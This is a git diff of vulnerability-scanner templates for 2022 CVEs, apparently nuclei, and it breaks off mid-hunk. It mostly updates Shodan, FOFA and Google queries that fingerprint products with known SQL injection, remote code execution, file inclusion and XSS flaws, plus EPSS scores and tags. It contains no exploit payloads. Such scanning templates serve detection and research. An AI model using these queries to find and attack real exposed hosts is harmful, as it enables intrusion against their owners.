hunter-query: app.name="phpmyadmin"&&web.body="pma_servername"&&web.body="4.8.4" tags: cve,cve2022,phpmyadmin,xss diff --git a/http/cves/2022/CVE-2022-2383.yaml b/http/cves/2022/CVE-2022-2383.yaml index b829368b51..0a986decfa 100644 --- a/http/cves/2022/CVE-2022-2383.yaml +++ b/http/cves/2022/CVE-2022-2383.yaml @@ -26,9 +26,9 @@ info: cpe: cpe:2.3:a:slickremix:feed_them_social:*:*:*:*:*:wordpress:*:* metadata: verified: true - max-request: 1 + max-request: 2 vendor: slickremix - product: feed_them_social + product: "feed_them_social" framework: wordpress tags: cve,cve2022,wp,wordpress,wp-plugin,wpscan,xss,slickremix flow: http(1) && http(2) diff --git a/http/cves/2022/CVE-2022-23854.yaml b/http/cves/2022/CVE-2022-23854.yaml index 5691148b78..682158a5e9 100644 --- a/http/cves/2022/CVE-2022-23854.yaml +++ b/http/cves/2022/CVE-2022-23854.yaml @@ -29,7 +29,9 @@ info: max-request: 1 vendor: aveva product: intouch_access_anywhere - shodan-query: http.html:"InTouch Access Anywhere" + shodan-query: + - http.html:"InTouch Access Anywhere" + - http.html:"intouch access anywhere" fofa-query: body="intouch access anywhere" tags: cve,cve2022,lfi,packetstorm,aveva,intouch diff --git a/http/cves/2022/CVE-2022-23898.yaml b/http/cves/2022/CVE-2022-23898.yaml index 10812b982d..c551eb69fd 100644 --- a/http/cves/2022/CVE-2022-23898.yaml +++ b/http/cves/2022/CVE-2022-23898.yaml @@ -27,7 +27,9 @@ info: max-request: 1 vendor: mingsoft product: mcms - shodan-query: http.favicon.hash:1464851260 + shodan-query: + - http.favicon.hash:1464851260 + - http.favicon.hash:"1464851260" fofa-query: icon_hash="1464851260" tags: cve,cve2022,sqli,mcms,mingsoft variables: diff --git a/http/cves/2022/CVE-2022-24112.yaml b/http/cves/2022/CVE-2022-24112.yaml index 4e4cf1573e..a0ca8f7ff1 100644 --- a/http/cves/2022/CVE-2022-24112.yaml +++ b/http/cves/2022/CVE-2022-24112.yaml @@ -26,8 +26,12 @@ info: max-request: 2 vendor: apache product: apisix - shodan-query: title:"Apache APISIX Dashboard" - fofa-query: title="Apache APISIX Dashboard" + shodan-query: + - title:"Apache APISIX Dashboard" + - http.title:"apache apisix dashboard" + fofa-query: + - title="Apache APISIX Dashboard" + - title="apache apisix dashboard" google-query: intitle:"apache apisix dashboard" tags: cve,cve2022,apache,rce,apisix,oast,kev,intrusive diff --git a/http/cves/2022/CVE-2022-24124.yaml b/http/cves/2022/CVE-2022-24124.yaml index 0e3edc5f15..25b04466fb 100644 --- a/http/cves/2022/CVE-2022-24124.yaml +++ b/http/cves/2022/CVE-2022-24124.yaml @@ -27,7 +27,9 @@ info: max-request: 1 vendor: casbin product: casdoor - shodan-query: http.title:"Casdoor" + shodan-query: + - http.title:"Casdoor" + - http.title:"casdoor" fofa-query: title="casdoor" google-query: intitle:"casdoor" tags: cve,cve2022,sqli,unauth,packetstorm,edb,casdoor,casbin diff --git a/http/cves/2022/CVE-2022-2414.yaml b/http/cves/2022/CVE-2022-2414.yaml index dbe557ccd0..a5b83f27c9 100644 --- a/http/cves/2022/CVE-2022-2414.yaml +++ b/http/cves/2022/CVE-2022-2414.yaml @@ -27,8 +27,13 @@ info: max-request: 1 vendor: dogtagpki product: dogtagpki - shodan-query: title:"Identity Management" html:"FreeIPA" - fofa-query: title="Identity Management" + shodan-query: + - title:"Identity Management" html:"FreeIPA" + - http.title:"identity management" html:"freeipa" + fofa-query: + - title="Identity Management" + - title="identity management" + - title="identity management" html:"freeipa" google-query: intitle:"identity management" html:"freeipa" tags: cve,cve2022,dogtag,freeipa,xxe,dogtagpki diff --git a/http/cves/2022/CVE-2022-24260.yaml b/http/cves/2022/CVE-2022-24260.yaml index 15397de3ba..4b04a25393 100644 --- a/http/cves/2022/CVE-2022-24260.yaml +++ b/http/cves/2022/CVE-2022-24260.yaml @@ -27,7 +27,9 @@ info: max-request: 1 vendor: voipmonitor product: voipmonitor - shodan-query: http.title:"VoIPmonitor" + shodan-query: + - http.title:"VoIPmonitor" + - http.title:"voipmonitor" fofa-query: title="voipmonitor" google-query: intitle:"voipmonitor" tags: cve,cve2022,voipmonitor,sqli,unauth diff --git a/http/cves/2022/CVE-2022-24288.yaml b/http/cves/2022/CVE-2022-24288.yaml index 344d622de6..4335f7155b 100644 --- a/http/cves/2022/CVE-2022-24288.yaml +++ b/http/cves/2022/CVE-2022-24288.yaml @@ -28,9 +28,18 @@ info: max-request: 2 vendor: apache product: airflow - shodan-query: title:"Airflow - DAGs" || http.html:"Apache Airflow" - fofa-query: title="sign in - airflow" - google-query: intitle:"sign in - airflow" + shodan-query: + - title:"Airflow - DAGs" || http.html:"Apache Airflow" + - http.title:"airflow - dags" || http.html:"apache airflow" + - http.title:"sign in - airflow" + - product:"redis" + fofa-query: + - title="sign in - airflow" + - apache airflow + - title="airflow - dags" || http.html:"apache airflow" + google-query: + - intitle:"sign in - airflow" + - intitle:"airflow - dags" || http.html:"apache airflow" tags: cve,cve2022,airflow,rce,apache http: diff --git a/http/cves/2022/CVE-2022-2462.yaml b/http/cves/2022/CVE-2022-2462.yaml index fe117426c4..c7f071301a 100644 --- a/http/cves/2022/CVE-2022-2462.yaml +++ b/http/cves/2022/CVE-2022-2462.yaml @@ -21,15 +21,15 @@ info: cvss-score: 5.3 cve-id: CVE-2022-2462 cwe-id: CWE-200 - epss-score: 0.02698 - epss-percentile: 0.90234 + epss-score: 0.02514 + epss-percentile: 0.90131 cpe: cpe:2.3:a:transposh:transposh_wordpress_translation:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 vendor: transposh product: transposh_wordpress_translation framework: wordpress - tags: cve,cve2022,wordpress,disclosure,wp-plugin,packetstorm,transposh + tags: cve,cve2022,wordpress,disclosure,wp-plugin,packetstorm,transposh,xss http: - method: POST diff --git a/http/cves/2022/CVE-2022-24627.yaml b/http/cves/2022/CVE-2022-24627.yaml index 4de131b055..68e1794fa6 100644 --- a/http/cves/2022/CVE-2022-24627.yaml +++ b/http/cves/2022/CVE-2022-24627.yaml @@ -15,15 +15,17 @@ info: cvss-score: 9.8 cve-id: CVE-2022-24627 cwe-id: CWE-89 - epss-score: 0.00109 - epss-percentile: 0.43163 + epss-score: 0.01642 + epss-percentile: 0.87541 cpe: cpe:2.3:a:audiocodes:device_manager_express:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 vendor: audiocodes product: device_manager_express - shodan-query: title:"Audiocodes" + shodan-query: + - title:"Audiocodes" + - http.title:"audiocodes" fofa-query: title="audiocodes" google-query: intitle:"audiocodes" tags: cve,cve2022,seclists,sqli,audiocodes diff --git a/http/cves/2022/CVE-2022-24681.yaml b/http/cves/2022/CVE-2022-24681.yaml index a7845152f0..51cafeb918 100644 --- a/http/cves/2022/CVE-2022-24681.yaml +++ b/http/cves/2022/CVE-2022-24681.yaml @@ -28,9 +28,15 @@ info: max-request: 1 vendor: zohocorp product: manageengine_adselfservice_plus - shodan-query: http.title:"manageengine" - fofa-query: title="manageengine" - google-query: intitle:"adselfservice plus" + shodan-query: + - http.title:"manageengine" + - http.title:"adselfservice plus" + fofa-query: + - title="manageengine" + - title="adselfservice plus" + google-query: + - intitle:"adselfservice plus" + - intitle:"manageengine" tags: cve,cve2022,manageengine,xss,authenticated,zohocorp http: diff --git a/http/cves/2022/CVE-2022-24716.yaml b/http/cves/2022/CVE-2022-24716.yaml index 0859f89d5c..4683216a4e 100644 --- a/http/cves/2022/CVE-2022-24716.yaml +++ b/http/cves/2022/CVE-2022-24716.yaml @@ -27,9 +27,16 @@ info: max-request: 3 vendor: icinga product: icinga_web_2 - shodan-query: title:"Icinga" - fofa-query: title="icinga web 2 login" - google-query: intitle:"icinga" + shodan-query: + - title:"Icinga" + - http.title:"icinga" + - http.title:"icinga web 2 login" + fofa-query: + - title="icinga web 2 login" + - title="icinga" + google-query: + - intitle:"icinga" + - intitle:"icinga web 2 login" tags: cve,cve2022,packetstorm,icinga,lfi http: diff --git a/http/cves/2022/CVE-2022-24816.yaml b/http/cves/2022/CVE-2022-24816.yaml index e1aa6c65e5..6683437020 100644 --- a/http/cves/2022/CVE-2022-24816.yaml +++ b/http/cves/2022/CVE-2022-24816.yaml @@ -29,7 +29,9 @@ info: vendor: geosolutionsgroup product: jai-ext shodan-query: /geoserver/ - fofa-query: app="GeoServer" + fofa-query: + - app="GeoServer" + - app="geoserver" tags: cve,cve2022,geoserver,rce,geosolutionsgroup http: diff --git a/http/cves/2022/CVE-2022-2487.yaml b/http/cves/2022/CVE-2022-2487.yaml index 7092a9c79e..5be8e1968b 100644 --- a/http/cves/2022/CVE-2022-2487.yaml +++ b/http/cves/2022/CVE-2022-2487.yaml @@ -28,7 +28,9 @@ info: max-request: 1 vendor: wavlink product: wl-wn535k2_firmware - shodan-query: http.title:"Wi-Fi APP Login" + shodan-query: + - http.title:"Wi-Fi APP Login" + - http.title:"wi-fi app login" fofa-query: title="wi-fi app login" google-query: intitle:"wi-fi app login" tags: cve,cve2022,iot,wavlink,router,rce,oast diff --git a/http/cves/2022/CVE-2022-2488.yaml b/http/cves/2022/CVE-2022-2488.yaml index a602a3869f..1a5a25e249 100644 --- a/http/cves/2022/CVE-2022-2488.yaml +++ b/http/cves/2022/CVE-2022-2488.yaml @@ -29,7 +29,9 @@ info: max-request: 1 vendor: wavlink product: wl-wn535k2_firmware - shodan-query: http.title:"Wi-Fi APP Login" + shodan-query: + - http.title:"Wi-Fi APP Login" + - http.title:"wi-fi app login" fofa-query: title="wi-fi app login" google-query: intitle:"wi-fi app login" tags: cve,cve2022,iot,wavlink,router,rce,oast diff --git a/http/cves/2022/CVE-2022-24899.yaml b/http/cves/2022/CVE-2022-24899.yaml index 003da4d752..4a031a0417 100644 --- a/http/cves/2022/CVE-2022-24899.yaml +++ b/http/cves/2022/CVE-2022-24899.yaml @@ -27,8 +27,14 @@ info: max-request: 1 vendor: contao product: contao - shodan-query: title:"Contao" - fofa-query: body="contao open source cms" + shodan-query: + - title:"Contao" + - http.title:"contao" + - http.html:"contao open source cms" + - cpe:"cpe:2.3:a:contao:contao" + fofa-query: + - body="contao open source cms" + - title="contao" google-query: intitle:"contao" tags: cve,cve2022,contao,xss,huntr diff --git a/http/cves/2022/CVE-2022-24990.yaml b/http/cves/2022/CVE-2022-24990.yaml index a76df5be0f..aa7eee32f2 100644 --- a/http/cves/2022/CVE-2022-24990.yaml +++ b/http/cves/2022/CVE-2022-24990.yaml @@ -27,7 +27,9 @@ info: max-request: 1 vendor: terra-master product: terramaster_operating_system - shodan-query: "TerraMaster" + shodan-query: + - "TerraMaster" + - terramaster tags: cve,cve2022,packetstorm,terramaster,exposure,kev,terra-master http: diff --git a/http/cves/2022/CVE-2022-25125.yaml b/http/cves/2022/CVE-2022-25125.yaml index 913fdf5257..5a4f659d3d 100644 --- a/http/cves/2022/CVE-2022-25125.yaml +++ b/http/cves/2022/CVE-2022-25125.yaml @@ -27,7 +27,9 @@ info: max-request: 1 vendor: mingsoft product: mcms - shodan-query: http.favicon.hash:1464851260 + shodan-query: + - http.favicon.hash:1464851260 + - http.favicon.hash:"1464851260" fofa-query: icon_hash="1464851260" tags: cve,cve2022,sqli,mcms,mingsoft variables: diff --git a/http/cves/2022/CVE-2022-25148.yaml b/http/cves/2022/CVE-2022-25148.yaml index 9b2466f4cd..ae3075df31 100644 --- a/http/cves/2022/CVE-2022-25148.yaml +++ b/http/cves/2022/CVE-2022-25148.yaml @@ -27,10 +27,10 @@ info: vendor: veronalabs product: wp_statistics framework: wordpress - google-query: inurl:/wp-content/plugins/wp-statistics - publicwww-query: /wp-content/plugins/wp-statistics/ shodan-query: http.html:/wp-content/plugins/wp-statistics/ fofa-query: body=/wp-content/plugins/wp-statistics/ + publicwww-query: /wp-content/plugins/wp-statistics/ + google-query: inurl:/wp-content/plugins/wp-statistics tags: cve,cve2022,packetstorm,sqli,wpscan,wordpress,wp-plugin,wp,wp-statistics,veronalabs http: diff --git a/http/cves/2022/CVE-2022-25149.yaml b/http/cves/2022/CVE-2022-25149.yaml index cfd50046d3..be6c12c2f9 100644 --- a/http/cves/2022/CVE-2022-25149.yaml +++ b/http/cves/2022/CVE-2022-25149.yaml @@ -26,10 +26,10 @@ info: vendor: veronalabs product: wp_statistics framework: wordpress - publicwww-query: "/wp-content/plugins/wp-statistics/" - google-query: inurl:/wp-content/plugins/wp-statistics shodan-query: http.html:/wp-content/plugins/wp-statistics/ fofa-query: body=/wp-content/plugins/wp-statistics/ + publicwww-query: "/wp-content/plugins/wp-statistics/" + google-query: inurl:/wp-content/plugins/wp-statistics tags: cve2022,cve,sqli,wpscan,wordpress,wp-plugin,wp,wp-statistics,veronalabs http: diff --git a/http/cves/2022/CVE-2022-2535.yaml b/http/cves/2022/CVE-2022-2535.yaml index a987a5e5be..355f3a1c3e 100644 --- a/http/cves/2022/CVE-2022-2535.yaml +++ b/http/cves/2022/CVE-2022-2535.yaml @@ -25,9 +25,9 @@ info: vendor: searchwp product: searchwp_live_ajax_search framework: wordpress - publicwww-query: "/wp-content/plugins/searchwp-live-ajax-search/" shodan-query: http.html:/wp-content/plugins/searchwp-live-ajax-search/ fofa-query: body=/wp-content/plugins/searchwp-live-ajax-search/ + publicwww-query: "/wp-content/plugins/searchwp-live-ajax-search/" tags: cve,cve2022,wp,wp-plugin,wordpress,wpscan,searchwp-live-ajax-search,searchwp http: diff --git a/http/cves/2022/CVE-2022-25356.yaml b/http/cves/2022/CVE-2022-25356.yaml index a863557fae..92deabe1a8 100644 --- a/http/cves/2022/CVE-2022-25356.yaml +++ b/http/cves/2022/CVE-2022-25356.yaml @@ -29,7 +29,9 @@ info: max-request: 1 vendor: altn product: securitygateway - google-query: inurl:"/SecurityGateway.dll" + google-query: + - inurl:"/SecurityGateway.dll" + - inurl:"/securitygateway.dll" tags: cve,cve2022,altn,gateway,xml,injection http: diff --git a/http/cves/2022/CVE-2022-25481.yaml b/http/cves/2022/CVE-2022-25481.yaml index d6c5a5d55f..0c7108892f 100644 --- a/http/cves/2022/CVE-2022-25481.yaml +++ b/http/cves/2022/CVE-2022-25481.yaml @@ -29,8 +29,13 @@ info: max-request: 1 vendor: thinkphp product: thinkphp - shodan-query: title:"ThinkPHP" - fofa-query: title="thinkphp" + shodan-query: + - title:"ThinkPHP" + - http.title:"thinkphp" + - cpe:"cpe:2.3:a:thinkphp:thinkphp" + fofa-query: + - title="thinkphp" + - header="think_lang" google-query: intitle:"thinkphp" tags: cve,cve2022,thinkphp,exposure,oss diff --git a/http/cves/2022/CVE-2022-25486.yaml b/http/cves/2022/CVE-2022-25486.yaml index 7c0e1a6919..0769494883 100644 --- a/http/cves/2022/CVE-2022-25486.yaml +++ b/http/cves/2022/CVE-2022-25486.yaml @@ -13,13 +13,14 @@ info: reference: - https://github.com/CuppaCMS/CuppaCMS - https://nvd.nist.gov/vuln/detail/CVE-2022-25486 + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H cvss-score: 7.8 cve-id: CVE-2022-25486 cwe-id: CWE-829 - epss-score: 0.01775 - epss-percentile: 0.8667 + epss-score: 0.01525 + epss-percentile: 0.87021 cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-2551.yaml b/http/cves/2022/CVE-2022-2551.yaml index 645d854f40..bfcae28bb8 100644 --- a/http/cves/2022/CVE-2022-2551.yaml +++ b/http/cves/2022/CVE-2022-2551.yaml @@ -29,7 +29,9 @@ info: vendor: snapcreek product: duplicator framework: wordpress - google-query: inurl:/backups-dup-lite/dup-installer/ + google-query: + - inurl:/backups-dup-lite/dup-installer/ + - inurl:"/wp-content/plugins/duplicator" tags: cve2022,cve,wordpress,wp,wp-plugin,duplicator,wpscan,snapcreek http: diff --git a/http/cves/2022/CVE-2022-25568.yaml b/http/cves/2022/CVE-2022-25568.yaml index a2ee72f049..e29a698c40 100644 --- a/http/cves/2022/CVE-2022-25568.yaml +++ b/http/cves/2022/CVE-2022-25568.yaml @@ -25,7 +25,9 @@ info: max-request: 1 vendor: motioneye_project product: motioneye - shodan-query: html:"MotionEye" + shodan-query: + - html:"MotionEye" + - http.html:"motioneye" fofa-query: body="motioneye" tags: cve,cve2022,motioneye,config,motioneye_project diff --git a/http/cves/2022/CVE-2022-2599.yaml b/http/cves/2022/CVE-2022-2599.yaml index 6cb8ae33eb..3330f4a699 100644 --- a/http/cves/2022/CVE-2022-2599.yaml +++ b/http/cves/2022/CVE-2022-2599.yaml @@ -29,7 +29,7 @@ info: vendor: anti-malware_security_and_brute-force_firewall_project product: anti-malware_security_and_brute-force_firewall framework: wordpress - tags: cve,cve2022,wordpress,wp-plugin,xss,gotmls,authenticated,wpscan + tags: cve,cve2022,wordpress,wp-plugin,xss,gotmls,authenticated,wpscan,anti-malware_security_and_brute-force_firewall_project http: - raw: diff --git a/http/cves/2022/CVE-2022-26134.yaml b/http/cves/2022/CVE-2022-26134.yaml index 2e733b9741..a3695fe80c 100644 --- a/http/cves/2022/CVE-2022-26134.yaml +++ b/http/cves/2022/CVE-2022-26134.yaml @@ -29,7 +29,9 @@ info: max-request: 2 vendor: atlassian product: confluence_data_center - shodan-query: http.component:"Atlassian Confluence" + shodan-query: + - http.component:"Atlassian Confluence" + - http.component:"atlassian confluence" fofa-query: app="atlassian-confluence" tags: cve,cve2022,packetstorm,confluence,rce,ognl,oast,kev,atlassian diff --git a/http/cves/2022/CVE-2022-26138.yaml b/http/cves/2022/CVE-2022-26138.yaml index 1aa280004b..1ad8ae0754 100644 --- a/http/cves/2022/CVE-2022-26138.yaml +++ b/http/cves/2022/CVE-2022-26138.yaml @@ -28,7 +28,9 @@ info: max-request: 1 vendor: atlassian product: questions_for_confluence - shodan-query: http.component:"Atlassian Confluence" + shodan-query: + - http.component:"Atlassian Confluence" + - http.component:"atlassian confluence" tags: cve2022,cve,confluence,atlassian,default-login,kev http: diff --git a/http/cves/2022/CVE-2022-26148.yaml b/http/cves/2022/CVE-2022-26148.yaml index 96532ca591..2fcf144a9b 100644 --- a/http/cves/2022/CVE-2022-26148.yaml +++ b/http/cves/2022/CVE-2022-26148.yaml @@ -28,8 +28,14 @@ info: max-request: 1 vendor: grafana product: grafana - shodan-query: title:"Grafana" - fofa-query: app="Grafana" + shodan-query: + - title:"Grafana" + - cpe:"cpe:2.3:a:grafana:grafana" + - http.title:"grafana" + fofa-query: + - app="Grafana" + - title="grafana" + - app="grafana" google-query: intitle:"grafana" tags: cve,cve2022,grafana,zabbix,exposure diff --git a/http/cves/2022/CVE-2022-26159.yaml b/http/cves/2022/CVE-2022-26159.yaml index 0b91d2fb85..6463c6cf7b 100644 --- a/http/cves/2022/CVE-2022-26159.yaml +++ b/http/cves/2022/CVE-2022-26159.yaml @@ -20,8 +20,8 @@ info: cvss-score: 5.3 cve-id: CVE-2022-26159 cwe-id: CWE-425 - epss-score: 0.00597 - epss-percentile: 0.76107 + epss-score: 0.00606 + epss-percentile: 0.78512 cpe: cpe:2.3:a:ametys:ametys:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-26263.yaml b/http/cves/2022/CVE-2022-26263.yaml index 177bda32c5..058a23b40d 100644 --- a/http/cves/2022/CVE-2022-26263.yaml +++ b/http/cves/2022/CVE-2022-26263.yaml @@ -28,8 +28,10 @@ info: verified: true vendor: yonyou product: u8\+ - google-query: inurl:/u8sl/WebHelp - tags: cve,cve2022,yonyou,xss + google-query: + - inurl:/u8sl/WebHelp + - inurl:/u8sl/webhelp + tags: cve,cve2022,yonyou,xss,headless headless: - steps: - args: diff --git a/http/cves/2022/CVE-2022-2627.yaml b/http/cves/2022/CVE-2022-2627.yaml index 5a85695798..63db4f4447 100644 --- a/http/cves/2022/CVE-2022-2627.yaml +++ b/http/cves/2022/CVE-2022-2627.yaml @@ -26,9 +26,11 @@ info: vendor: tagdiv product: newspaper framework: wordpress - publicwww-query: "/wp-content/themes/Newspaper" shodan-query: http.html:/wp-content/themes/newspaper fofa-query: body=/wp-content/themes/newspaper + publicwww-query: + - "/wp-content/themes/Newspaper" + - /wp-content/themes/newspaper tags: cve2022,cve,xss,wordpress,wp,wp-theme,newspaper,wpscan,tagdiv http: diff --git a/http/cves/2022/CVE-2022-2633.yaml b/http/cves/2022/CVE-2022-2633.yaml index a1058dbcb8..1104b7c04a 100644 --- a/http/cves/2022/CVE-2022-2633.yaml +++ b/http/cves/2022/CVE-2022-2633.yaml @@ -21,8 +21,8 @@ info: cvss-score: 8.2 cve-id: CVE-2022-2633 cwe-id: CWE-610 - epss-score: 0.07008 - epss-percentile: 0.93291 + epss-score: 0.02868 + epss-percentile: 0.9073 cpe: cpe:2.3:a:plugins360:all-in-one_video_gallery:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-26564.yaml b/http/cves/2022/CVE-2022-26564.yaml index 35c3711134..bd1a120cb2 100644 --- a/http/cves/2022/CVE-2022-26564.yaml +++ b/http/cves/2022/CVE-2022-26564.yaml @@ -28,8 +28,12 @@ info: max-request: 3 vendor: digitaldruid product: hoteldruid - shodan-query: http.favicon.hash:-1521640213 - fofa-query: title="hoteldruid" + shodan-query: + - http.favicon.hash:-1521640213 + - http.title:"hoteldruid" + fofa-query: + - title="hoteldruid" + - icon_hash=-1521640213 google-query: intitle:"hoteldruid" tags: cve,cve2022,hoteldruid,xss,digitaldruid diff --git a/http/cves/2022/CVE-2022-2733.yaml b/http/cves/2022/CVE-2022-2733.yaml index 082f8d651a..41dc47f1ca 100644 --- a/http/cves/2022/CVE-2022-2733.yaml +++ b/http/cves/2022/CVE-2022-2733.yaml @@ -27,8 +27,16 @@ info: max-request: 2 vendor: open-emr product: openemr - shodan-query: title:"OpenEMR" - fofa-query: icon_hash=1971268439 + shodan-query: + - title:"OpenEMR" + - http.html:"openemr" + - http.title:"openemr" + - http.favicon.hash:1971268439 + fofa-query: + - icon_hash=1971268439 + - body="openemr" + - title="openemr" + - app="openemr" google-query: intitle:"openemr" tags: cve,cve2022,xss,openemr,authenticated,huntr,open-emr diff --git a/http/cves/2022/CVE-2022-2756.yaml b/http/cves/2022/CVE-2022-2756.yaml index be6fdc39ce..e2f534bd38 100644 --- a/http/cves/2022/CVE-2022-2756.yaml +++ b/http/cves/2022/CVE-2022-2756.yaml @@ -27,7 +27,9 @@ info: max-request: 3 vendor: kavitareader product: kavita - shodan-query: title:"kavita" + shodan-query: + - title:"kavita" + - http.title:"kavita" fofa-query: title="kavita" google-query: intitle:"kavita" tags: cve,cve2022,ssrf,kavita,authenticated,huntr,intrusive,kavitareader diff --git a/http/cves/2022/CVE-2022-27593.yaml b/http/cves/2022/CVE-2022-27593.yaml index 90e837297d..7bb1a722f8 100644 --- a/http/cves/2022/CVE-2022-27593.yaml +++ b/http/cves/2022/CVE-2022-27593.yaml @@ -29,9 +29,17 @@ info: max-request: 1 vendor: qnap product: photo_station - shodan-query: title:"QNAP" - fofa-query: title="photo station" - google-query: intitle:"qnap" + shodan-query: + - title:"QNAP" + - http.title:"photo station" + - http.title:"qnap" + - 'content-length: 580 "http server 1.0"' + fofa-query: + - title="photo station" + - title="qnap" + google-query: + - intitle:"qnap" + - intitle:"photo station" tags: cve2022,cve,qnap,lfi,kev http: diff --git a/http/cves/2022/CVE-2022-27926.yaml b/http/cves/2022/CVE-2022-27926.yaml index 091d447707..a05b52613f 100644 --- a/http/cves/2022/CVE-2022-27926.yaml +++ b/http/cves/2022/CVE-2022-27926.yaml @@ -29,8 +29,13 @@ info: max-request: 1 vendor: zimbra product: collaboration - fofa-query: app="zimbra-邮件系统" - shodan-query: http.favicon.hash:"1624375939" + shodan-query: + - http.favicon.hash:"1624375939" + - http.favicon.hash:"475145467" + fofa-query: + - app="zimbra-邮件系统" + - icon_hash="475145467" + - icon_hash="1624375939" tags: cve,cve2022,zimbra,xss,kev http: diff --git a/http/cves/2022/CVE-2022-27927.yaml b/http/cves/2022/CVE-2022-27927.yaml index 1ff0eadb94..d0eab25243 100644 --- a/http/cves/2022/CVE-2022-27927.yaml +++ b/http/cves/2022/CVE-2022-27927.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-27927 cwe-id: CWE-89 - epss-score: 0.10451 - epss-percentile: 0.94459 + epss-score: 0.33545 + epss-percentile: 0.97064 cpe: cpe:2.3:a:microfinance_management_system_project:microfinance_management_system:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-27984.yaml b/http/cves/2022/CVE-2022-27984.yaml index 5c9b564a9c..bb0dfd0968 100644 --- a/http/cves/2022/CVE-2022-27984.yaml +++ b/http/cves/2022/CVE-2022-27984.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-27984 cwe-id: CWE-89 - epss-score: 0.03664 - epss-percentile: 0.90798 + epss-score: 0.02079 + epss-percentile: 0.89045 cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-28219.yaml b/http/cves/2022/CVE-2022-28219.yaml index a1abe5b0a7..4b7ecc162d 100644 --- a/http/cves/2022/CVE-2022-28219.yaml +++ b/http/cves/2022/CVE-2022-28219.yaml @@ -31,7 +31,9 @@ info: max-request: 1 vendor: zohocorp product: manageengine_adaudit_plus - shodan-query: http.title:"ADAudit Plus" || http.title:"ManageEngine - ADManager Plus" + shodan-query: + - http.title:"ADAudit Plus" || http.title:"ManageEngine - ADManager Plus" + - http.title:"adaudit plus" || http.title:"manageengine - admanager plus" fofa-query: title="adaudit plus" || http.title:"manageengine - admanager plus" google-query: intitle:"adaudit plus" || http.title:"manageengine - admanager plus" tags: cve,cve2022,xxe,rce,zoho,manageengine,unauth,zohocorp diff --git a/http/cves/2022/CVE-2022-28290.yaml b/http/cves/2022/CVE-2022-28290.yaml index 174f43ac00..440a8a3110 100644 --- a/http/cves/2022/CVE-2022-28290.yaml +++ b/http/cves/2022/CVE-2022-28290.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2022-28290 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.36353 + epss-percentile: 0.37623 cpe: cpe:2.3:a:welaunch:wordpress_country_selector:1.6.5:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2022/CVE-2022-28363.yaml b/http/cves/2022/CVE-2022-28363.yaml index c4c63a5174..2bbb9c08e3 100644 --- a/http/cves/2022/CVE-2022-28363.yaml +++ b/http/cves/2022/CVE-2022-28363.yaml @@ -28,8 +28,12 @@ info: max-request: 1 vendor: reprisesoftware product: reprise_license_manager - shodan-query: http.html:"reprise license" - fofa-query: body="reprise license manager" + shodan-query: + - http.html:"reprise license" + - http.html:"reprise license manager" + fofa-query: + - body="reprise license manager" + - body="reprise license" google-query: inurl:"/goforms/menu" tags: cve,cve2022,xss,rlm,packetstorm,reprisesoftware diff --git a/http/cves/2022/CVE-2022-28365.yaml b/http/cves/2022/CVE-2022-28365.yaml index 6eb13e21e4..5880ee6692 100644 --- a/http/cves/2022/CVE-2022-28365.yaml +++ b/http/cves/2022/CVE-2022-28365.yaml @@ -28,8 +28,12 @@ info: max-request: 1 vendor: reprisesoftware product: reprise_license_manager - shodan-query: http.html:"reprise license" - fofa-query: body="reprise license manager" + shodan-query: + - http.html:"reprise license" + - http.html:"reprise license manager" + fofa-query: + - body="reprise license manager" + - body="reprise license" google-query: inurl:"/goforms/menu" tags: cve,cve2022,rlm,packetstorm,exposure,reprisesoftware diff --git a/http/cves/2022/CVE-2022-28923.yaml b/http/cves/2022/CVE-2022-28923.yaml index d3b76c01df..fca70f095d 100644 --- a/http/cves/2022/CVE-2022-28923.yaml +++ b/http/cves/2022/CVE-2022-28923.yaml @@ -29,7 +29,9 @@ info: max-request: 1 vendor: caddyserver product: caddy - shodan-query: 'Server: caddy' + shodan-query: + - 'Server: caddy' + - "server: caddy" tags: cve,cve2022,redirect,caddy,webserver,caddyserver http: diff --git a/http/cves/2022/CVE-2022-28955.yaml b/http/cves/2022/CVE-2022-28955.yaml index 126a2daab7..e9b9f80dbe 100644 --- a/http/cves/2022/CVE-2022-28955.yaml +++ b/http/cves/2022/CVE-2022-28955.yaml @@ -29,7 +29,9 @@ info: max-request: 2 vendor: dlink product: dir-816l_firmware - shodan-query: http.html:"DIR-816L" + shodan-query: + - http.html:"DIR-816L" + - http.html:"dir-816l" fofa-query: body="dir-816l" tags: cve2022,cve,dlink,exposure diff --git a/http/cves/2022/CVE-2022-29153.yaml b/http/cves/2022/CVE-2022-29153.yaml index 5145a0635b..181ef85449 100644 --- a/http/cves/2022/CVE-2022-29153.yaml +++ b/http/cves/2022/CVE-2022-29153.yaml @@ -21,14 +21,17 @@ info: cve-id: CVE-2022-29153 cwe-id: CWE-918 epss-score: 0.02376 - epss-percentile: 0.89603 + epss-percentile: 0.89839 cpe: cpe:2.3:a:hashicorp:consul:*:*:*:*:-:*:*:* metadata: verified: true max-request: 2 vendor: hashicorp product: consul - shodan-query: title:"Consul by HashiCorp" + shodan-query: + - title:"Consul by HashiCorp" + - http.title:"consul by hashicorp" + - cpe:"cpe:2.3:a:hashicorp:consul" fofa-query: title="consul by hashicorp" google-query: intitle:"consul by hashicorp" tags: cve,cve2022,consul,hashicorp,ssrf,intrusive diff --git a/http/cves/2022/CVE-2022-29272.yaml b/http/cves/2022/CVE-2022-29272.yaml index 9a4b9d84ab..87cdb83179 100644 --- a/http/cves/2022/CVE-2022-29272.yaml +++ b/http/cves/2022/CVE-2022-29272.yaml @@ -29,7 